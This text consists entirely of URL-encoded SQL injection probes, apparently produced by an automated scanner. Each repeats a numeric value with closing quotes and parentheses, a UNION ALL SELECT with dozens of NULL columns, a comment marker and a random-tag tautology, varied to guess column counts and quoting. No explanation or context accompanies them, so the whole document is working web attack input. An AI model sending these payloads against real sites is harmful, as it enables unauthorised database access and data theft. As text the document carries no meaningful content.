1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27qEit%27%3D%27qEit 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pLNn%27%3D%27pLNn 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27mMuB%27%3D%27mMuB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hPcd%27%3D%27hPcd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bagz%27%3D%27bagz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27SMIg%27%3D%27SMIg 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27racJ%27%3D%27racJ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27jUws%27%3D%27jUws 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mHLO%27%3D%27mHLO 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27iymU%27%3D%27iymU 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27GPvg%27%3D%27GPvg 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27cBvK%27%3D%27cBvK 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HNIT%27%3D%27HNIT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27iwOH%27%3D%27iwOH 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27VrMm%27%3D%27VrMm 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27hLWK%27%3D%27hLWK 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27JLHf%27%3D%27JLHf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ApKf%27%20LIKE%20%27ApKf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ceiE%27%20LIKE%20%27ceiE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27wZjJ%27%20LIKE%20%27wZjJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27NyUl%27%20LIKE%20%27NyUl 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27iHmE%27%20LIKE%20%27iHmE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27fHzR%27%20LIKE%20%27fHzR 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27WGDw%27%20LIKE%20%27WGDw 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27FGpm%27%20LIKE%20%27FGpm 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27XxZT%27%20LIKE%20%27XxZT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27joTl%27%20LIKE%20%27joTl 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27kxfQ%27%20LIKE%20%27kxfQ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27MjPV%27%20LIKE%20%27MjPV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27qhPf%27%20LIKE%20%27qhPf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27dpwC%27%20LIKE%20%27dpwC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ytfs%27%20LIKE%20%27ytfs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Fzco%27%20LIKE%20%27Fzco 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27BPTt%27%20LIKE%20%27BPTt 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27SFSb%27%20LIKE%20%27SFSb 